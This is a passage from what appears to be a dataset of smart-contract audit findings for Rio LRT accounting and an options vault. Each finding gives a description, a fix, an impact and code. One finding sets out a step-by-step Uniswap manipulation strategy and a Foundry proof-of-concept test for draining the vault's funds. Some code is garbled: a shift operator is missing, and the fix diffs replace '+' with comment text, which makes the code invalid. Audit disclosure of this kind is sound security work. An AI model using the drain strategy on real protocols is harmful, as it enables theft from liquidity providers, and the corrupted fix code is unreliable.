(BEACON_CHAIN_STRATEGY) is calculated in the AssetRegistry:\\n```\\nfunction getTVLForAsset(address asset) public view returns (uint256) {\\n uint256 balance = getTotalBalanceForAsset(asset);\\n if (asset == ETH_ADDRESS) {\\n return balance;\\n }\\n return convertToUnitOfAccountFromAsset(asset, balance);\\n }\\n\\n function getTotalBalanceForAsset(address asset) public view returns (uint256) {\\n if (!isSupportedAsset(asset)) revert ASSET_NOT_SUPPORTED(asset);\\n\\n address depositPool_ = address(depositPool());\\n if (asset == ETH_ADDRESS) {\\n return depositPool_.balance + getETHBalanceInEigenLayer();\\n }\\n\\n uint256 sharesHeld = getAssetSharesHeld(asset);\\n uint256 tokensInRio = IERC20(asset).balanceOf(depositPool_);\\n uint256 tokensInEigenLayer = convertFromSharesToAsset(getAssetStrategy(asset), sharesHeld);\\n\\n return tokensInRio + tokensInEigenLayer;\\n }\\n\\n function 
getETHBalanceInEigenLayer() public view returns (uint256 balance) {\\n balance = ethBalanceInUnverifiedValidators;\\n\\n IRioLRTOperatorRegistry operatorRegistry_ = operatorRegistry();\\n -> uint8 endAtID = operatorRegistry_.operatorCount() + 1; // Operator IDs start at 1.\\n -> for (uint8 id = 1; id < endAtID; ++id) {\\n -> balance += operatorDelegator(operatorRegistry_, id).getETHUnderManagement();\\n }\\n }\\n```\\n\\nAs we can see above, regardless of the operators cap the entire active validator counts are looped.\\n```\\nfunction getEigenPodShares() public view returns (int256) {\\n return eigenPodManager.podOwnerShares(address(this));\\n }\\n\\n function getETHQueuedForWithdrawal() public view returns (uint256) {\\n uint256 ethQueuedSlotData;\\n assembly {\\n ethQueuedSlotData := sload(ethQueuedForUserSettlementGwei.slot)\\n }\\n\\n uint64 userSettlementGwei = uint64(ethQueuedSlotData);\\n uint64 operatorExitAndScrapeGwei = uint64(ethQueuedSlotData 64);\\n\\n return (userSettlementGwei + operatorExitAndScrapeGwei).toWei();\\n }\\n\\n function getETHUnderManagement() external view returns (uint256) {\\n int256 aum = getEigenPodShares() + int256(getETHQueuedForWithdrawal());\\n if (aum < 0) return 0;\\n\\n return uint256(aum);\\n }\\n```\\n\\nSince the operator has eigen pod shares, the TVL will account it aswell. However, since the operator is not actively participating on ether deposits (not in the heap order) the withdrawals or deposits to this specific operator is impossible. Hence, the TVL is accounting an operators eigen pod share which the contract assumes that it is not in the heap.\\nTextual PoC: Assume there are 5 operators whereas only 4 of these operators are actively participating in BEACON_CHAIN_STRATEGY which means that 1 operator has no validator caps set hence, it is not in the heap order. However, this operator can still have ether deposits and can verify them. 
Since the TVL accounting loops over all the operators but not the operators that are actively participating in beacon chain strategy, the TVL calculated will be wrong.чPut a check on `verifyWithdrawalCredentials` so that it is not possible to call the function if the operator is not actively participating in the BEACON_CHAIN_STRATEGY.чMiscalculation of total ether holdings of an LRT. Withdrawals can fail because the calculated ether does not exist in the heap but the TVL says there is ether to withdraw from the LRT.ч```\\nfunction getTVLForAsset(address asset) public view returns (uint256) {\\n uint256 balance = getTotalBalanceForAsset(asset);\\n if (asset == ETH_ADDRESS) {\\n return balance;\\n }\\n return convertToUnitOfAccountFromAsset(asset, balance);\\n }\\n\\n function getTotalBalanceForAsset(address asset) public view returns (uint256) {\\n if (!isSupportedAsset(asset)) revert ASSET_NOT_SUPPORTED(asset);\\n\\n address depositPool_ = address(depositPool());\\n if (asset == ETH_ADDRESS) {\\n return depositPool_.balance + getETHBalanceInEigenLayer();\\n }\\n\\n uint256 sharesHeld = getAssetSharesHeld(asset);\\n uint256 tokensInRio = IERC20(asset).balanceOf(depositPool_);\\n uint256 tokensInEigenLayer = convertFromSharesToAsset(getAssetStrategy(asset), sharesHeld);\\n\\n return tokensInRio + tokensInEigenLayer;\\n }\\n\\n function getETHBalanceInEigenLayer() public view returns (uint256 balance) {\\n balance = ethBalanceInUnverifiedValidators;\\n\\n IRioLRTOperatorRegistry operatorRegistry_ = operatorRegistry();\\n -> uint8 endAtID = operatorRegistry_.operatorCount() + 1; // Operator IDs start at 1.\\n -> for (uint8 id = 1; id < endAtID; ++id) {\\n -> balance += operatorDelegator(operatorRegistry_, id).getETHUnderManagement();\\n }\\n }\\n```\\n -`requestWithdrawal` doesn't estimate accurately the available shares for withdrawalsчmediumчThe `requestWithdrawal` function inaccurately estimates the available shares for withdrawals by including funds stored in the 
deposit pool into the already deposited EigenLayer shares. This can potentially lead to blocking withdrawals or users receiving less funds for their shares.\\nFor a user to withdraw funds from the protocol, they must first request a withdrawal using the `requestWithdrawal` function, which queues the withdrawal in the current epoch by calling `withdrawalQueue().queueWithdrawal`.\\nTo evaluate the available shares for withdrawal, the function converts the protocol asset balance into shares:\\n```\\nuint256 availableShares = assetRegistry().convertToSharesFromAsset(asset, assetRegistry().getTotalBalanceForAsset(asset));\\n```\\n\\nThe issue arises from the `getTotalBalanceForAsset` function, which returns the sum of the protocol asset funds held, including assets already deposited into EigenLayer and assets still in the deposit pool:\\n```\\nfunction getTotalBalanceForAsset(\\n address asset\\n) public view returns (uint256) {\\n if (!isSupportedAsset(asset)) revert ASSET_NOT_SUPPORTED(asset);\\n\\n address depositPool_ = address(depositPool());\\n if (asset == ETH_ADDRESS) {\\n return depositPool_.balance + getETHBalanceInEigenLayer();\\n }\\n\\n uint256 sharesHeld = getAssetSharesHeld(asset);\\n uint256 tokensInRio = IERC20(asset).balanceOf(depositPool_);\\n uint256 tokensInEigenLayer = convertFromSharesToAsset(\\n getAssetStrategy(asset),\\n sharesHeld\\n );\\n\\n return tokensInRio + tokensInEigenLayer;\\n}\\n```\\n\\nThis causes the calculated `availableShares` to differ from the actual shares held by the protocol because the assets still in the deposit pool shouldn't be converted to shares with the current share price (shares/asset) as they were not deposited into EigenLayer yet.\\nDepending on the current shares price, the function might over or under-estimate the available shares in the protocol. 
This can potentially result in allowing more queued withdrawals than the available shares in the protocol, leading to blocking withdrawals later on or users receiving less funds for their shares.чThere is no straightforward way to handle this issue as the assets held by the deposit pool can't be converted into shares while they have not been deposited into EigenLayer. The code should be reviewed to address this issue.чThe `requestWithdrawal` function inaccurately estimates the available shares for withdrawals, potentially resulting in blocking withdrawals or users receiving less funds for their shares.ч```\\nuint256 availableShares = assetRegistry().convertToSharesFromAsset(asset, assetRegistry().getTotalBalanceForAsset(asset));\\n```\\n -Slashing penalty is unfairly paid by a subset of users if a deficit is accumulated.чmediumчIf a deficit is accumulated in the EigenPodManager due to slashing when ETH is being withdrawn, the slashing payment will be taken from the first cohort to complete a withdrawal.\\nA deficit can happen in `podOwnerShares[podOwner]` in the EigenPodManager in the EigenLayer protocol. 
This can happen if validators are slashed when ETH is queued for withdrawal.\\nThe issue is that this deficit will be paid for by the next cohort to complete a withdrawal by calling `settleEpochFromEigenLayer()`.\\nIn the following code we can see how `epochWithdrawals.assetsReceived` is calculated based on the amount received from the `delegationManager.completeQueuedWithdrawal` call\\n```\\n uint256 balanceBefore = asset.getSelfBalance();\\n\\n address[] memory assets = asset.toArray();\\n bytes32[] memory roots = new bytes32[](queuedWithdrawalCount);\\n\\n IDelegationManager.Withdrawal memory queuedWithdrawal;\\n for (uint256 i; i < queuedWithdrawalCount; ++i) {\\n queuedWithdrawal = queuedWithdrawals[i];\\n\\n roots[i] = _computeWithdrawalRoot(queuedWithdrawal);\\n delegationManager.completeQueuedWithdrawal(queuedWithdrawal, assets, middlewareTimesIndexes[i], true);\\n\\n // Decrease the amount of ETH queued for withdrawal. We do not need to validate the staker as\\n // the aggregate root will be validated below.\\n if (asset == ETH_ADDRESS) {\\n IRioLRTOperatorDelegator(queuedWithdrawal.staker).decreaseETHQueuedForUserSettlement(\\n queuedWithdrawal.shares[0]\\n );\\n }\\n }\\n if (epochWithdrawals.aggregateRoot != keccak256(abi.encode(roots))) {\\n revert INVALID_AGGREGATE_WITHDRAWAL_ROOT();\\n }\\n epochWithdrawals.shareValueOfAssetsReceived = SafeCast.toUint120(epochWithdrawals.sharesOwed);\\n\\n uint256 assetsReceived = asset.getSelfBalance() - balanceBefore;\\n epochWithdrawals.assetsReceived += SafeCast.toUint120(assetsReceived);\\n```\\n\\nthe amount received could be 0 if the deficit is larger than the amount queued for this cohort. 
See following code in `withdrawSharesAsTokens()` EigenPodManager\\n```\\n } else {\\n podOwnerShares[podOwner] += int256(shares);\\n emit PodSharesUpdated(podOwner, int256(shares));\\n return;\\n }\\n```\\n\\nThese users will pay for all slashing penalties instead of it being spread out among all LRT holders.чA potential solution to deal with this is to check if a deficit exists in `settleEpochFromEigenLayer()`. If it exists functionality has to be added that spreads the cost of the penalty fairly among all LRT holders.чIf a deficit is accumulated the first cohort to settle will pay for the entire amount. If they can not cover it fully, they will receive 0 and the following cohort will pay for the rest.ч```\\n uint256 balanceBefore = asset.getSelfBalance();\\n\\n address[] memory assets = asset.toArray();\\n bytes32[] memory roots = new bytes32[](queuedWithdrawalCount);\\n\\n IDelegationManager.Withdrawal memory queuedWithdrawal;\\n for (uint256 i; i < queuedWithdrawalCount; ++i) {\\n queuedWithdrawal = queuedWithdrawals[i];\\n\\n roots[i] = _computeWithdrawalRoot(queuedWithdrawal);\\n delegationManager.completeQueuedWithdrawal(queuedWithdrawal, assets, middlewareTimesIndexes[i], true);\\n\\n // Decrease the amount of ETH queued for withdrawal. 
We do not need to validate the staker as\\n // the aggregate root will be validated below.\\n if (asset == ETH_ADDRESS) {\\n IRioLRTOperatorDelegator(queuedWithdrawal.staker).decreaseETHQueuedForUserSettlement(\\n queuedWithdrawal.shares[0]\\n );\\n }\\n }\\n if (epochWithdrawals.aggregateRoot != keccak256(abi.encode(roots))) {\\n revert INVALID_AGGREGATE_WITHDRAWAL_ROOT();\\n }\\n epochWithdrawals.shareValueOfAssetsReceived = SafeCast.toUint120(epochWithdrawals.sharesOwed);\\n\\n uint256 assetsReceived = asset.getSelfBalance() - balanceBefore;\\n epochWithdrawals.assetsReceived += SafeCast.toUint120(assetsReceived);\\n```\\n -ETH withdrawers do not earn yield while waiting for a withdrawalчmediumчIn the Rio doc we can read the following\\n\"Users will continue to earn yield as they wait for their withdrawal request to be processed.\"\\nThis is not true for withdrawals in ETH since they will simply receive an equivalent to the `sharesOWed` calculated when requesting a withdrawal.\\nWhen `requestWithdrawal()` is called to withdraw ETH `sharesOwed` is calculated\\n```\\nsharesOwed = convertToSharesFromRestakingTokens(asset, amountIn);\\n```\\n\\nThe total `sharesOwed` in ETH is added to `epcohWithdrawals.assetsReceived` if we settle with `settleCurrentEpoch()` or `settleEpochFromEigenlayer()`\\nBelow are the places where `assetsReceived` is is set and accumulated\\n```\\nepochWithdrawals.assetsReceived = SafeCast.toUint120(assetsReceived);\\n```\\n\\n```\\nepochWithdrawals.assetsReceived = SafeCast.toUint120(assetsReceived); \\n```\\n\\n```\\nepochWithdrawals.assetsReceived += SafeCast.toUint120(assetsReceived);\\n```\\n\\nwhen claiming rewards this is used to calculate users share\\n```\\namountOut = userSummary.sharesOwed.mulDiv(epochWithdrawals.assetsReceived, epochWithdrawals.sharesOwed);\\n```\\n\\nThe portion of staking rewards accumulated during withdrawal that belongs to LRT holders is never accounted for so withdrawing users do not earn any rewards when 
waiting for a withdrawal to be completed.чAccount for the accumulated rewards during the withdrawal period that belong to the deposit pool. This can be calculated based on data in DelayedWithdrawalRouter on Eigenlayer.чSince a portion of the staking reward belongs to the LRT holders and since the docs mention that yield is accumulated while in the queue, it is fair to assume that withdrawing users have a proportional claim to the yield.\\nAs shown above this is not true, users withdrawing in ETH do not earn any rewards when withdrawing.\\nNot all depositors will be able to withdraw their assets/principal for non-ETH assets.\\nCzar102\\nI see. I will leave it a duplicate of #109, as it was, which will not change the reward distribution from the scenario where it was invalidated. cc @nevillehuang\\nThanks for reminding me to remove #177 from the duplicates @0xmonrel.\\nCzar102\\nResult: Medium Has Duplicates\\nConsidering this a Medium since the loss is constrained to the interest during some of the withdrawal time, which is a small part of the deposits.\\nsherlock-admin3\\nEscalations have been resolved successfully!\\nEscalation status:\\n0xmonrel: acceptedч```\\nsharesOwed = convertToSharesFromRestakingTokens(asset, amountIn);\\n```\\n -The sign of delta hedge amount can be reversed by malicious user due to incorrect condition in `FinanceIGDelta.deltaHedgeAmount`чhighчWhen delta hedge amount is calculated after the trade, the final check is to account for sqrt computation error and ensure the exchanged amount of side token doesn't exceed amount of side tokens the vault has. The issue is that this check is incorrect: it compares absolute value of the delta hedge amount, but always sets positive amount of side tokens if the condition is true. 
If the delta hedge amount is negative, this final check will reverse the sign of the delta hedge amount, messing up the hedged assets the protocol has.\\nAs a result, if the price moves significantly before the next delta hedge, protocol might not have enough funds to pay off users due to incorrect hedging. It also allows the user to manipulate underlying uniswap pool, then force the vault to delta hedge large amount at very bad price while trading tiny position of size 1 wei, without paying any fees. Repeating this process, the malicious user can drain/steal all funds from the vault in a very short time.\\nThe final check in calculating delta hedge amount in `FinanceIGDelta.deltaHedgeAmount` is:\\n```\\n // due to sqrt computation error, sideTokens to sell may be very few more than available\\n if (SignedMath.abs(tokensToSwap) > params.sideTokensAmount) {\\n if (SignedMath.abs(tokensToSwap) - params.sideTokensAmount < params.sideTokensAmount / 10000) {\\n tokensToSwap = SignedMath.revabs(params.sideTokensAmount, true);\\n }\\n }\\n```\\n\\nThe logic is that if due to small computation errors, delta hedge amount (to sell side token) can slightly exceed amount of side tokens the vault has, when in reality it means to just sell all side tokens the vault has, then delta hedge amount should equal to side tokens amount vault has.\\nThe issue here is that only positive delta hedge amount means vault has to sell side tokens, while negative amount means it has to buy side tokens. But the condition compares `abs(tokensToSwap)`, meaning that if the delta hedge amount is negative, but in absolute value very close to side tokens amount the vault has, then the condition will also be true, which will set `tokensToSwap` to a positive amount of side tokens, i.e. will reverse the delta hedge amount from `-sideTokens` to `+sideTokens`.\\nIt's very easy for malicious user to craft such situation. 
For example, if current price is significantly greater than strike price, and there are no other open trades, simply buy IG bull options for 50% of the vault amount. Then buy IG bull options for another 50%. The first trade will force the vault to buy ETH for delta hedge, while the second trade will force the vault to sell the same ETH amount instead of buying it. If there are open trades, it's also easy to calculate the correct proportions of the trades to make `delta hedge amount = -side tokens`.\\nOnce the vault incorrectly hedges after malicious user's trade, there are multiple bad scenarios which will harm the protocol. For example:\\nIf no trade happens for some time and the price increases, the protocol will have no side tokens to hedge, but the bull option buyers will still receive their payoff, leaving vault LPs in a loss, up to a situation when the vault will not have enough funds to even pay the option buyers payoff.\\nMalicious user can abuse the vault's incorrect hedge to directly profit from it. After the trade described above, any trade, even 1 wei trade, will make vault re-hedge with the correct hedge amount, which can be a significant amount. Malicious user can abuse it by manipulating the underlying uniswap pool: 2.1. Buy underlying uniswap pool up to the edge of allowed range (say, +1.8% of current price, average price of ETH bought = +0.9% of current price) 2.2. Provide uniswap liquidity in that narrow range (+1.8%..+2.4%) 2.3. Open/close any position in IG with amount = 1 wei (basically paying no fees) -> this forces the vault to delta hedge (buy) large amount of ETH at inflated price ~+2% of the current price. 2.5. Remove uniswap liquidity. 2.6. Sell back in the uniswap pool. 2.7. During the delta hedge, uniswap position will buy ETH (uniswap liquidity will sell ETH) at the average price of +2.1% of the current price, also receiving pool fees. 
The fees for manipulating the pool and \"closing\" position via providing liquidity will cancel out and overall profit will be: +2.1% - 0.9% = +1.2% of the delta hedge amount.\\nThe strategy can be enchanced to optimize the profitability, but the idea should be clear.чThe check should be done only when `tokensToSwap` is positive:\\n```\\n // due to sqrt computation error, sideTokens to sell may be very few more than available\\n- if (SignedMath.abs(tokensToSwap) > params.sideTokensAmount) {\\n+ if (tokensToSwap > 0 && SignedMath.abs(tokensToSwap) > params.sideTokensAmount) {\\n if (SignedMath.abs(tokensToSwap) - params.sideTokensAmount < params.sideTokensAmount / 10000) {\\n tokensToSwap = SignedMath.revabs(params.sideTokensAmount, true);\\n }\\n }\\n```\\nчMalicious user can steal all vault funds, and/or the vault LPs will incur losses higher than uniswap LPs or vault will be unable to payoff the traders due to incorrect hedged amount.\\nProof Of Concept\\nCopy to attack.t.sol:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.15;\\n\\nimport {Test} from \"forge-std/Test.sol\";\\nimport {console} from \"forge-std/console.sol\";\\nimport {UD60x18, ud, convert} from \"@prb/math/UD60x18.sol\";\\n\\nimport {IERC20} from \"@openzeppelin/contracts/token/ERC20/IERC20.sol\";\\nimport {IPositionManager} from \"@project/interfaces/IPositionManager.sol\";\\nimport {Epoch} from \"@project/lib/EpochController.sol\";\\nimport {AmountsMath} from \"@project/lib/AmountsMath.sol\";\\nimport {EpochFrequency} from \"@project/lib/EpochFrequency.sol\";\\nimport {OptionStrategy} from \"@project/lib/OptionStrategy.sol\";\\nimport {AddressProvider} from \"@project/AddressProvider.sol\";\\nimport {MarketOracle} from \"@project/MarketOracle.sol\";\\nimport {FeeManager} from \"@project/FeeManager.sol\";\\nimport {Vault} from \"@project/Vault.sol\";\\nimport {TestnetToken} from \"@project/testnet/TestnetToken.sol\";\\nimport {TestnetPriceOracle} from 
\"@project/testnet/TestnetPriceOracle.sol\";\\nimport {DVPUtils} from \"./utils/DVPUtils.sol\";\\nimport {TokenUtils} from \"./utils/TokenUtils.sol\";\\nimport {Utils} from \"./utils/Utils.sol\";\\nimport {VaultUtils} from \"./utils/VaultUtils.sol\";\\nimport {MockedIG} from \"./mock/MockedIG.sol\";\\nimport {MockedRegistry} from \"./mock/MockedRegistry.sol\";\\nimport {MockedVault} from \"./mock/MockedVault.sol\";\\nimport {TestnetSwapAdapter} from \"@project/testnet/TestnetSwapAdapter.sol\";\\nimport {PositionManager} from \"@project/periphery/PositionManager.sol\";\\n\\n\\ncontract IGVaultTest is Test {\\n using AmountsMath for uint256;\\n\\n address admin = address(0x1);\\n\\n // User of Vault\\n address alice = address(0x2);\\n address bob = address(0x3);\\n\\n //User of DVP\\n address charlie = address(0x4);\\n address david = address(0x5);\\n\\n AddressProvider ap;\\n TestnetToken baseToken;\\n TestnetToken sideToken;\\n FeeManager feeManager;\\n\\n MockedRegistry registry;\\n\\n MockedVault vault;\\n MockedIG ig;\\n TestnetPriceOracle priceOracle;\\n TestnetSwapAdapter exchange;\\n uint _strike;\\n\\n function setUp() public {\\n vm.warp(EpochFrequency.REF_TS);\\n //ToDo: Replace with Factory\\n vm.startPrank(admin);\\n ap = new AddressProvider(0);\\n registry = new MockedRegistry();\\n ap.grantRole(ap.ROLE_ADMIN(), admin);\\n registry.grantRole(registry.ROLE_ADMIN(), admin);\\n ap.setRegistry(address(registry));\\n\\n vm.stopPrank();\\n\\n vault = MockedVault(VaultUtils.createVault(EpochFrequency.DAILY, ap, admin, vm));\\n priceOracle = TestnetPriceOracle(ap.priceOracle());\\n\\n baseToken = TestnetToken(vault.baseToken());\\n sideToken = TestnetToken(vault.sideToken());\\n\\n vm.startPrank(admin);\\n \\n ig = new MockedIG(address(vault), address(ap));\\n ig.grantRole(ig.ROLE_ADMIN(), admin);\\n ig.grantRole(ig.ROLE_EPOCH_ROLLER(), admin);\\n vault.grantRole(vault.ROLE_ADMIN(), admin);\\n vm.stopPrank();\\n ig.setOptionPrice(1e3);\\n 
ig.setPayoffPerc(0.1e18); // 10 % -> position paying 1.1\\n ig.useRealDeltaHedge();\\n ig.useRealPercentage();\\n ig.useRealPremium();\\n\\n DVPUtils.disableOracleDelayForIG(ap, ig, admin, vm);\\n\\n vm.prank(admin);\\n registry.registerDVP(address(ig));\\n vm.prank(admin);\\n MockedVault(vault).setAllowedDVP(address(ig));\\n feeManager = FeeManager(ap.feeManager());\\n\\n exchange = TestnetSwapAdapter(ap.exchangeAdapter());\\n }\\n\\n function testIncorrectDeltaHedge() public {\\n _strike = 1e18;\\n VaultUtils.addVaultDeposit(alice, 1e18, admin, address(vault), vm);\\n VaultUtils.addVaultDeposit(bob, 1e18, admin, address(vault), vm);\\n\\n Utils.skipDay(true, vm);\\n\\n vm.prank(admin);\\n ig.rollEpoch();\\n\\n VaultUtils.logState(vault);\\n DVPUtils.debugState(ig);\\n\\n testBuyOption(1.09e18, 0.5e18, 0);\\n testBuyOption(1.09e18, 0.5e18, 0);\\n }\\n\\n function testBuyOption(uint price, uint128 optionAmountUp, uint128 optionAmountDown) internal {\\n\\n vm.prank(admin);\\n priceOracle.setTokenPrice(address(sideToken), price);\\n\\n (uint256 premium, uint256 fee) = _assurePremium(charlie, _strike, optionAmountUp, optionAmountDown);\\n\\n vm.startPrank(charlie);\\n premium = ig.mint(charlie, _strike, optionAmountUp, optionAmountDown, premium, 1e18, 0);\\n vm.stopPrank();\\n\\n console.log(\"premium\", premium);\\n VaultUtils.logState(vault);\\n }\\n\\n function testSellOption(uint price, uint128 optionAmountUp, uint128 optionAmountDown) internal {\\n vm.prank(admin);\\n priceOracle.setTokenPrice(address(sideToken), price);\\n\\n uint256 charliePayoff;\\n uint256 charliePayoffFee;\\n {\\n vm.startPrank(charlie);\\n (charliePayoff, charliePayoffFee) = ig.payoff(\\n ig.currentEpoch(),\\n _strike,\\n optionAmountUp,\\n optionAmountDown\\n );\\n\\n charliePayoff = ig.burn(\\n ig.currentEpoch(),\\n charlie,\\n _strike,\\n optionAmountUp,\\n optionAmountDown,\\n charliePayoff,\\n 0.1e18\\n );\\n vm.stopPrank();\\n\\n console.log(\"payoff received\", charliePayoff);\\n 
}\\n\\n VaultUtils.logState(vault);\\n }\\n\\n function _assurePremium(\\n address user,\\n uint256 strike,\\n uint256 amountUp,\\n uint256 amountDown\\n ) private returns (uint256 premium_, uint256 fee) {\\n (premium_, fee) = ig.premium(strike, amountUp, amountDown);\\n TokenUtils.provideApprovedTokens(admin, address(baseToken), user, address(ig), premium_*2, vm);\\n }\\n}\\n```\\n\\nExecution console:\\n```\\n baseToken balance 1000000000000000000\\n sideToken balance 1000000000000000000\\n// rest of code\\n premium 0\\n baseToken balance 2090000000000000000\\n sideToken balance 0\\n// rest of code\\n premium 25585649987654406\\n baseToken balance 1570585649987654474\\n sideToken balance 499999999999999938\\n// rest of code\\n premium 25752512349788475\\n baseToken balance 2141338162337442881\\n sideToken balance 0\\n// rest of code\\n premium 0\\n baseToken balance 1051338162337442949\\n sideToken balance 999999999999999938\\n// rest of code\\n```\\n\\nNotice:\\nFirst trade (amount = 1 wei) settles delta-hedge at current price (1.09): sideToken = 0 because price is just above kB\\n2nd trade (buy ig bull amount = 0.5) causes delta-hedge of buying 0.5 side token\\n3rd trade (buy ig bull amount = 0.5) causes delta-hedge of selling 0.5 side token (instead of buying 0.5)\\nLast trade (amount = 1 wei) causes vault to buy 1 side token for correct delta-hedge (but at 0 fee to user).ч```\\n // due to sqrt computation error, sideTokens to sell may be very few more than available\\n if (SignedMath.abs(tokensToSwap) > params.sideTokensAmount) {\\n if (SignedMath.abs(tokensToSwap) - params.sideTokensAmount < params.sideTokensAmount / 10000) {\\n tokensToSwap = SignedMath.revabs(params.sideTokensAmount, true);\\n }\\n }\\n```\\n -Position Manager providing the wrong strike when storing user's position dataчmediumчWhen users mint position using `PositionManager`, users can provide strike that want to be used for the trade. 
However, if the provided strike data is not exactly the same with IG's current strike, the minted position's will be permanently stuck inside the PositionManager's contract.\\nWhen `mint` is called inside `PositionManager`, it will calculate the premium, transfer the required base token, and eventually call `dvp.mint`, providing the user's provided information.\\n```\\n function mint(\\n IPositionManager.MintParams calldata params\\n ) external override returns (uint256 tokenId, uint256 premium) {\\n IDVP dvp = IDVP(params.dvpAddr);\\n\\n if (params.tokenId != 0) {\\n tokenId = params.tokenId;\\n ManagedPosition storage position = _positions[tokenId];\\n\\n if (ownerOf(tokenId) != msg.sender) {\\n revert NotOwner();\\n }\\n // Check token compatibility:\\n if (position.dvpAddr != params.dvpAddr || position.strike != params.strike) {\\n revert InvalidTokenID();\\n }\\n Epoch memory epoch = dvp.getEpoch();\\n if (position.expiry != epoch.current) {\\n revert PositionExpired();\\n }\\n }\\n if ((params.notionalUp > 0 && params.notionalDown > 0) && (params.notionalUp != params.notionalDown)) {\\n // If amount is a smile, it must be balanced:\\n revert AsymmetricAmount();\\n }\\n\\n uint256 obtainedPremium;\\n uint256 fee;\\n (obtainedPremium, fee) = dvp.premium(params.strike, params.notionalUp, params.notionalDown);\\n\\n // Transfer premium:\\n // NOTE: The PositionManager is just a middleman between the user and the DVP\\n IERC20 baseToken = IERC20(dvp.baseToken());\\n baseToken.safeTransferFrom(msg.sender, address(this), obtainedPremium);\\n\\n // Premium already include fee\\n baseToken.safeApprove(params.dvpAddr, obtainedPremium);\\n\\n==> premium = dvp.mint(\\n address(this),\\n params.strike,\\n params.notionalUp,\\n params.notionalDown,\\n params.expectedPremium,\\n params.maxSlippage,\\n params.nftAccessTokenId\\n );\\n\\n // // rest of code.\\n }\\n```\\n\\n```\\n /// @inheritdoc IDVP\\n function mint(\\n address recipient,\\n uint256 strike,\\n uint256 
amountUp,\\n uint256 amountDown,\\n uint256 expectedPremium,\\n uint256 maxSlippage,\\n uint256 nftAccessTokenId\\n ) external override returns (uint256 premium_) {\\n strike;\\n _checkNFTAccess(nftAccessTokenId, recipient, amountUp + amountDown);\\n Amount memory amount_ = Amount({up: amountUp, down: amountDown});\\n\\n==> premium_ = _mint(recipient, financeParameters.currentStrike, amount_, expectedPremium, maxSlippage);\\n }\\n```\\n\\n```\\n function mint(\\n IPositionManager.MintParams calldata params\\n ) external override returns (uint256 tokenId, uint256 premium) {\\n // // rest of code\\n\\n if (obtainedPremium > premium) {\\n baseToken.safeTransferFrom(address(this), msg.sender, obtainedPremium - premium);\\n }\\n\\n if (params.tokenId == 0) {\\n // Mint token:\\n tokenId = _nextId++;\\n _mint(params.recipient, tokenId);\\n\\n Epoch memory epoch = dvp.getEpoch();\\n\\n // Save position:\\n _positions[tokenId] = ManagedPosition({\\n dvpAddr: params.dvpAddr,\\n==> strike: params.strike,\\n expiry: epoch.current,\\n premium: premium,\\n leverage: (params.notionalUp + params.notionalDown) / premium,\\n notionalUp: params.notionalUp,\\n notionalDown: params.notionalDown,\\n cumulatedPayoff: 0\\n });\\n } else {\\n ManagedPosition storage position = _positions[tokenId];\\n // Increase position:\\n position.premium += premium;\\n position.notionalUp += params.notionalUp;\\n position.notionalDown += params.notionalDown;\\n /* NOTE:\\n When, within the same epoch, a user wants to buy, sell partially\\n and then buy again, the leverage computation can fail due to\\n decreased notional; in order to avoid this issue, we have to\\n also adjust (decrease) the premium in the burn flow.\\n */\\n position.leverage = (position.notionalUp + position.notionalDown) / position.premium;\\n }\\n\\n emit BuyDVP(tokenId, _positions[tokenId].expiry, params.notionalUp + params.notionalDown);\\n emit Buy(params.dvpAddr, _positions[tokenId].expiry, premium, params.recipient);\\n 
}\\n```\\n\\nPoC\\nAdd the following test to `PositionManagerTest` contract :\\n```\\n function testMintAndBurnFail() public {\\n (uint256 tokenId, ) = initAndMint();\\n bytes4 PositionNotFound = bytes4(keccak256(\"PositionNotFound()\"));\\n\\n vm.prank(alice);\\n vm.expectRevert(PositionNotFound);\\n pm.sell(\\n IPositionManager.SellParams({\\n tokenId: tokenId,\\n notionalUp: 10 ether,\\n notionalDown: 0,\\n expectedMarketValue: 0,\\n maxSlippage: 0.1e18\\n })\\n );\\n }\\n```\\n\\nModify `initAndMint` function to the following :\\n```\\n function initAndMint() private returns (uint256 tokenId, IG ig) {\\n vm.startPrank(admin);\\n ig = new IG(address(vault), address(ap));\\n ig.grantRole(ig.ROLE_ADMIN(), admin);\\n ig.grantRole(ig.ROLE_EPOCH_ROLLER(), admin);\\n vault.grantRole(vault.ROLE_ADMIN(), admin);\\n vault.setAllowedDVP(address(ig));\\n\\n MarketOracle mo = MarketOracle(ap.marketOracle());\\n\\n mo.setDelay(ig.baseToken(), ig.sideToken(), ig.getEpoch().frequency, 0, true);\\n\\n Utils.skipDay(true, vm);\\n ig.rollEpoch();\\n vm.stopPrank();\\n\\n uint256 strike = ig.currentStrike();\\n\\n (uint256 expectedMarketValue, ) = ig.premium(0, 10 ether, 0);\\n TokenUtils.provideApprovedTokens(admin, baseToken, DEFAULT_SENDER, address(pm), expectedMarketValue, vm);\\n // NOTE: somehow, the sender is something else without this prank// rest of code\\n vm.prank(DEFAULT_SENDER);\\n (tokenId, ) = pm.mint(\\n IPositionManager.MintParams({\\n dvpAddr: address(ig),\\n notionalUp: 10 ether,\\n notionalDown: 0,\\n strike: strike + 1,\\n recipient: alice,\\n tokenId: 0,\\n expectedPremium: expectedMarketValue,\\n maxSlippage: 0.1e18,\\n nftAccessTokenId: 0\\n })\\n );\\n assertGe(1, tokenId);\\n assertGe(1, pm.totalSupply());\\n }\\n```\\n\\nRun the test :\\n```\\nforge test --match-contract PositionManagerTest --match-test testMintAndBurnFail -vvv\\n```\\nчWhen storing user position data inside PositionManager, query IG's current price and use it instead.\\n```\\n function 
mint(\\n IPositionManager.MintParams calldata params\\n ) external override returns (uint256 tokenId, uint256 premium) {\\n // // rest of code\\n\\n if (params.tokenId == 0) {\\n // Mint token:\\n tokenId = _nextId// Add the line below\\n// Add the line below\\n;\\n _mint(params.recipient, tokenId);\\n\\n Epoch memory epoch = dvp.getEpoch();\\n// Add the line below\\n uint256 currentStrike = dvp.currentStrike();\\n\\n // Save position:\\n _positions[tokenId] = ManagedPosition({\\n dvpAddr: params.dvpAddr,\\n// Remove the line below\\n strike: params.strike,\\n// Add the line below\\n strike: currentStrike,\\n expiry: epoch.current,\\n premium: premium,\\n leverage: (params.notionalUp // Add the line below\\n params.notionalDown) / premium,\\n notionalUp: params.notionalUp,\\n notionalDown: params.notionalDown,\\n cumulatedPayoff: 0\\n });\\n } else {\\n ManagedPosition storage position = _positions[tokenId];\\n // Increase position:\\n position.premium // Add the line below\\n= premium;\\n position.notionalUp // Add the line below\\n= params.notionalUp;\\n position.notionalDown // Add the line below\\n= params.notionalDown;\\n /* NOTE:\\n When, within the same epoch, a user wants to buy, sell partially\\n and then buy again, the 